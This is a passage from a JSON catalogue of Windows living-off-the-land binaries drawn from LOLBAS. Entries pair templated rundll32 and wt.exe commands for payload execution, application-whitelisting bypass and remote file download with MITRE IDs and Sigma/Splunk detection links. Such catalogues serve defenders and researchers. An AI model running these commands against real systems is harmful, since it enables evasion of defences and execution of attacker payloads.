HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\wordpad.exe"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml"}],"references":["https://gist.github.com/mblzk/b8c5ff7c2bd0fb2b385cc2fdd119874b","https://lolbas-project.github.io/lolbas/Binaries/write/"]},{"id":"lolbas:wt-exe:0","toolId":"lolbas:wt-exe","toolName":"wt.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wt.exe {CMD}","description":"Execute a command via Windows Terminal.","usecase":"Use wt.exe as a proxy binary to evade defensive counter-measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_<version_packageid>\\wt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml"}],"references":["https://twitter.com/nas_bench/status/1552100271668469761","https://lolbas-project.github.io/lolbas/Binaries/wt/"]},{"id":"lolbas:advpack-dll:0","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1,","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"]},{"id":"lolbas:advpack-dll:1","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},,1,","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"]},{"id":"lolbas:advpack-dll:2","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe advpack.dll,RegisterOCX {PATH:.dll}","description":"Launch a DLL payload by calling the RegisterOCX function.","usecase":"Load a DLL payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"]},{"id":"lolbas:advpack-dll:3","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe advpack.dll,RegisterOCX {PATH:.exe}","description":"Launch an executable by calling the RegisterOCX function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"]},{"id":"lolbas:advpack-dll:4","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32 advpack.dll, RegisterOCX {CMD}","description":"Launch command line by calling the RegisterOCX function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"]},{"id":"lolbas:desk-cpl:0","toolId":"lolbas:desk-cpl","toolName":"Desk.cpl","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr}","description":"Launch an executable with a .scr extension by calling the InstallScreenSaver function.","usecase":"Launch any executable payload, as long as it uses the .scr extension.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\desk.cpl","C:\\Windows\\SysWOW64\\desk.cpl"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml"}],"references":["https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt","https://twitter.com/pabraeken/status/998627081360695297","https://twitter.com/VakninHai/status/1517027824984547329","https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files","https://lolbas-project.github.io/lolbas/Libraries/Desk/"]},{"id":"lolbas:desk-cpl:1","toolId":"lolbas:desk-cpl","toolName":"Desk.cpl","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr}","description":"Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.","usecase":"Launch any executable payload, as long as it uses the .scr extension.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\desk.cpl","C:\\Windows\\SysWOW64\\desk.cpl"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml"}],"references":["https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt","https://twitter.com/pabraeken/status/998627081360695297","https://twitter.com/VakninHai/status/1517027824984547329","https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files","https://lolbas-project.github.io/lolbas/Libraries/Desk/"]},{"id":"lolbas:dfshim-dll:0","toolId":"lolbas:dfshim-dll","toolName":"Dfshim.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}","description":"Executes click-once-application from URL (trampoline for Dfsvc.exe, DotNet ClickOnce host)","usecase":"Use binary to bypass Application whitelisting","mitre":["T1127.002"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe","https://lolbas-project.github.io/lolbas/Libraries/Dfshim/"]},{"id":"lolbas:ieadvpack-dll:0","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},DefaultInstall_SingleUser,1,","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"]},{"id":"lolbas:ieadvpack-dll:1","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},,1,","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"]},{"id":"lolbas:ieadvpack-dll:2","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.dll}","description":"Launch a DLL payload by calling the RegisterOCX function.","usecase":"Load a DLL payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"]},{"id":"lolbas:ieadvpack-dll:3","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.exe}","description":"Launch an executable by calling the RegisterOCX function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"]},{"id":"lolbas:ieadvpack-dll:4","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32 ieadvpack.dll, RegisterOCX {CMD}","description":"Launch command line by calling the RegisterOCX function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"]},{"id":"lolbas:ieframe-dll:0","toolId":"lolbas:ieframe-dll","toolName":"Ieframe.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe ieframe.dll,OpenURL {PATH_ABSOLUTE:.url}","description":"Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.","usecase":"Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieframe.dll","c:\\windows\\syswow64\\ieframe.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/","https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/bohops/status/997690405092290561","https://windows10dll.nirsoft.net/ieframe_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Ieframe/"]},{"id":"lolbas:mshtml-dll:0","toolId":"lolbas:mshtml-dll","toolName":"Mshtml.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe Mshtml.dll,PrintHTML {PATH_ABSOLUTE:.hta}","description":"Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box).","usecase":"Launch an HTA application.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\mshtml.dll","c:\\windows\\syswow64\\mshtml.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://twitter.com/pabraeken/status/998567549670477824","https://windows10dll.nirsoft.net/mshtml_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Mshtml/"]},{"id":"lolbas:pcwutl-dll:0","toolId":"lolbas:pcwutl-dll","toolName":"Pcwutl.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe pcwutl.dll,LaunchApplication {PATH:.exe}","description":"Launch executable by calling the LaunchApplication function.","usecase":"Launch an executable.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\pcwutl.dll","c:\\windows\\syswow64\\pcwutl.dll"],"toolType":"Library","detection":[{"type":"Analysis","value":"https://redcanary.com/threat-detection-report/techniques/rundll32/"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://twitter.com/harr0ey/status/989617817849876488","https://windows10dll.nirsoft.net/pcwutl_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/"]},{"id":"lolbas:photoviewer-dll:0","toolId":"lolbas:photoviewer-dll","toolName":"PhotoViewer.dll","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"rundll32.exe \"C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll\",ImageView_Fullscreen {REMOTEURL}","description":"Once executed, rundll32.exe will download the file at the specified URL to the user's INetCache folder using the Windows Photo Viewer DLL.","usecase":"Download file from remote location.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll","C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll"],"toolType":"Library","detection":[{"type":"IOC","value":"Execution of rundll32.exe with 'ImageView_Fullscreen' and a remote URL (containing '://') as an argument"}],"references":["https://lolbas-project.github.io/lolbas/Libraries/PhotoViewer/"]},{"id":"lolbas:scrobj-dll:0","toolId":"lolbas:scrobj-dll","toolName":"Scrobj.dll","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"rundll32.exe C:\\Windows\\System32\\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe}","description":"Once executed, scrobj.dll attempts to load a file from the URL and saves it to INetCache.","usecase":"Download file from remote location.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\scrobj.dll","c:\\windows\\syswow64\\scrobj.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"IOC","value":"Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line"}],"references":["https://twitter.com/eral4m/status/1479106975967240209","https://lolbas-project.github.io/lolbas/Libraries/Scrobj/"]},{"id":"lolbas:setupapi-dll:0","toolId":"lolbas:setupapi-dll","toolName":"Setupapi.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\setupapi.dll","c:\\windows\\syswow64\\setupapi.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml"}],"references":["https://github.com/huntresslabs/evading-autoruns","https://twitter.com/pabraeken/status/994742106852941825","https://windows10dll.nirsoft.net/setupapi_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Setupapi/"]},{"id":"lolbas:setupapi-dll:1","toolId":"lolbas:setupapi-dll","toolName":"Setupapi.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}","description":"Launch an executable file via the InstallHinfSection function and .inf file section directive.","usecase":"Load an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\setupapi.dll","c:\\windows\\syswow64\\setupapi.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml"}],"references":["https://github.com/huntresslabs/evading-autoruns","https://twitter.com/pabraeken/status/994742106852941825","https://windows10dll.nirsoft.net/setupapi_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Setupapi/"]},{"id":"lolbas:shdocvw-dll:0","toolId":"lolbas:shdocvw-dll","toolName":"Shdocvw.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe shdocvw.dll,OpenURL {PATH_ABSOLUTE:.url}","description":"Launch an executable payload via proxy through a URL (information) file by calling OpenURL.","usecase":"Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shdocvw.dll","c:\\windows\\syswow64\\shdocvw.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/","https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/bohops/status/997690405092290561","https://windows10dll.nirsoft.net/shdocvw_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/"]},{"id":"lolbas:shell32-dll:0","toolId":"lolbas:shell32-dll","toolName":"Shell32.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe shell32.dll,Control_RunDLL {PATH_ABSOLUTE:.dll}","description":"Launch a DLL payload by calling the Control_RunDLL function.","usecase":"Load a DLL payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml"}],"references":["https://twitter.com/Hexacorn/status/885258886428725250","https://twitter.com/pabraeken/status/991768766898941953","https://twitter.com/mattifestation/status/776574940128485376","https://twitter.com/KyleHanslovan/status/905189665120149506","https://windows10dll.nirsoft.net/shell32_dll.html","https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/","https://lolbas-project.github.io/lolbas/Libraries/Shell32/"]},{"id":"lolbas:shell32-dll:1","toolId":"lolbas:shell32-dll","toolName":"Shell32.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe shell32.dll,ShellExec_RunDLL {PATH:.exe}","description":"Launch an executable by calling the ShellExec_RunDLL function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml"}],"references":["https://twitter.com/Hexacorn/status/885258886428725250","https://twitter.com/pabraeken/status/991768766898941953","https://twitter.com/mattifestation/status/776574940128485376","https://twitter.com/KyleHanslovan/status/905189665120149506","https://windows10dll.nirsoft.net/shell32_dll.html","https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/","https://lolbas-project.github.io/lolbas/Libraries/Shell32/"]},{"id":"lolbas:shell32-dll:2","toolId":"lolbas:shell32-dll","toolName":"Shell32.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32 SHELL32.DLL,ShellExec_RunDLL {PATH:.exe} {CMD:args}","description":"Launch command line by calling the ShellExec_RunDLL function.","usecase":"Run an executable 